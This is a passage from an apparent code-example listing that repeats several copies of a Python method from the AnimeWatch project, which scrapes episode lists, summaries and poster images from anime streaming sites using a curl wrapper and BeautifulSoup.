			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content)
		if siteName == "Cartoon-World" or siteName == "Cartoon" or siteName == "Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m

Example 18

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content,'lxml')
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m

Example 19

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content,'lxml')
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m

Example 20

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content,'lxml')
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
				print(img)
				
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				
				try:
					if not os.path.isfile(picn):
						ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				except:
					pass
		elif siteName == "Dubcrazy":
			
					
			try:
				summary = ""
				link = soup.findAll('div',{'class':'main_container'})
				#print(link
				for i in link:
					j = i.findAll('p')
					for k in j:
						summary = k.text
				
				img = "http://www.dubbedanimeonline.pw/images/" + name+".jpg"
				print(img)
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
					ccurlNew(img+'#'+'-o'+'#'+picn)
			except:
				summary = "No Summary Available"
				picn = "No"
			#print(img
		if siteName != "AniDub" and siteName != "CartoonMax": 
			fi = base + name+ '[^"]*/'
			m = re.findall(fi, content)
			j=0
			for i in m:
				i = re.sub(base,"",i)
				m[j] = i[:-1]
				j = j + 1
		m=naturallysorted(m)
		m.append(picn)
		m.append(summary)
		return m

Example 21

Project: AnimeWatch
Source File: DubbedAnime.py
View license
	def getEpnList(self,siteName,name,category):
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			base = "http://www.cartoon-world.tv/"
			url = base+ "watch/" + name+"/"
		elif siteName == "Dubcrazy":
			base = "http://www.dubbedanimeonline.pw/"
			url = base+ "view/" + name+"/" 
		elif siteName == "Animetycoon":
			base = "http://www.animetycoon.net/"
			url = base+ "watch/" + name+"/"
		elif siteName == "AniDub":
			base = "http://www.watchcartoononline.com/"
			if category == "Movie":
					url = "http://www.watchcartoononline.com/" + name
			else:
					url = "http://www.watchcartoononline.com/anime/" + name
		elif siteName == "AnimeStatic":
			base = "http://www.animestatic.co/"
			if category == "Movies": 
				url = "http://www.animestatic.co/" + name + '/'
			else:
				url = "http://www.animestatic.co/anime/" + name + '/'
		elif siteName == "CartoonMax":
			url = "http://gogocartoon.us/category/" + name 
			base = "http://gogocartoon.us/"
			
		
		print(url)
		#if base_url == 0:
		#content = subprocess.check_output(['curl','-A',hdr,url]) 
		#else:
		#	content = ccurl(url,"no_redir")
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = ccurlNew(url+'#'+'-L')
		else:
			"""
			hdrs = {'user-agent':self.hdr}
			req = requests.get(url,headers=hdrs)
			summary = ""
			content = req.text
			"""
			#content = (subprocess.check_output(['curl','-A',self.hdr,url]))
			#content = self.getContent(content)
			content = content = ccurlNew(url+'#'+'-L')
		soup = BeautifulSoup(content,'lxml')
		if siteName == "Cartoon-World" or siteName == "Cartoon-World-Cartoon" or siteName == "Cartoon-World-Movies":
	
				link1 = soup.findAll('div',{'class':'ani-row'})
				print(link1)
				try:
					img1 = link1[0].find('img',{'class':'anime'})
					print(img1)
					img = img1['src']
					if not "http://" in img:
						img2 = re.findall('/images/[^"]*',img)
						img = "http://www.cartoon-world.tv"+img2[0]
						print(img)
					
					picn = "/tmp/AnimeWatch/"+name+'.jpg'
					if not os.path.isfile(picn) and img:
						#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img])
						ccurlNew(img+'#'+'-o'+'#'+picn)
				except:
					picn = "No.jpg"
					img = ""
				try:
					summary=str(link1[1])
				
					summary = re.sub('</table>','</table><div class="desc">',summary)
					summary = re.sub('</div>','</div></div>',summary)
					print(summary)
					soup = BeautifulSoup(summary)

					info = soup.findAll('td',{'class':'ani-table-ans'})

					summary = info[0].text+'\nType: '+ info[1].text+ '\nAired: ' + info[2].text + '\nGenre: ' + info[3].text+soup.find('div',{'class':'desc'}).text 
				except:
					summary = "No Summary Available"
				
		
		elif siteName == "AniDub" or siteName == "AnimeStatic":
			m = []
			if category == "Movies":
				m.append(name)
			else:
				if siteName == "AniDub":
					link = soup.findAll('div',{'class':'menustyle'})
				else:
					link = soup.findAll('ul',{ 'class':'eps eps-list'})
				for i in link:
					a = i.findAll('a')
					for j in a:
							k=(j['href']).split('/')
							if siteName == "AniDub":
								m.append(k[-1])
							else:
								m.append(k[-2])
		
			if siteName == "AniDub":
				img = []
				link = soup.findAll('div',{'class':'katcont'})		 	
				for i in link:
					summary = re.sub('\n','',i.text)
				img = re.findall('http[^"]*.jpg',content)
				
			elif siteName == "AnimeStatic":
				link = soup.find("div",{ "class":"deskripsi"})
				summary = ""
				img = []
				if link:
					
					sumr= link.find('p')
					summary = sumr.text
					#summary = re.sub('Genres[^\n]*\n','Genres : ',summary)
					#summary = re.sub('Title[^\n]*\n','Title : ',summary)
					#summary = re.sub('Rating[^\n]*\n','Rating : ',summary)
					#summary = re.sub('[)]','',summary)
					#summary = re.sub('[,][^"]\n','\n',summary)
				link = soup.find('div',{'class':'imganime'})
				if link:
					img1 = link.find('img')
					if img1:
						img.append(img1['src'])
					
			picn = "/tmp/AnimeWatch/" + name + ".jpg"
			if not os.path.isfile(picn) and img:
				#subprocess.call(["curl","-A",self.hdr,"-L","-o",picn,img[0]])
				ccurlNew(img[0]+'#'+'-o'+'#'+picn)
		elif siteName == "Animetycoon":
			img =[]
			#text = str(text)
			#print(text
			try:
				text = soup.find('article')
				text1 = text.find('p')
				summary = text1.text
				try:
					img1 = text.find('img')['src']
					if 'http' not in img1:
						img1 = 'http:' + img1
					img.append(img1)
				except:
					img = re.findall('//[^"]*posters/[^"]*.jpg',content)
					img[0] = "http:" + img[0]
				picn = "/tmp/AnimeWatch/" + name + ".jpg"
				if not os.path.isfile(picn):
					#subprocess.call(["curl","-L","-o",picn,img[0]])
					ccurlNew(img[0]+'#'+'-o'+'#'+picn)
				
			except: 
				summary = "No Summary Available"
				picn = "No"
		elif siteName == "CartoonMax":
				m = []
				link = soup.find('div',{'class':'list-chapter mCustomScrollbar'})
				if link:
					j = link.findAll('a')
					for k in j:
						tmp = k['href'].split('/')[-1]
						m.append(tmp)
					
				else:
					link = soup.find('div',{'class':'anime_info_episodes'})
				
					link1 = link.findAll('a')
					for i in link1:
						k = i['href'].split('/')[-1]
						m.append(k)
				summary = ""
				link = soup.find('div',{ 'class':'description'})
				img = []
				summary = link.text
					
				link = soup.find('div',{ 'class':'box-content'})
				img1_src = link.find('div',{ 'class':'img'})
				img_src = link.find('img')['src'] 
				if ' ' in img_src:
					img_src = re.sub(" ","%20",img_src)
				print(img_src)
				if img_src:
					img.append(img_src)
					
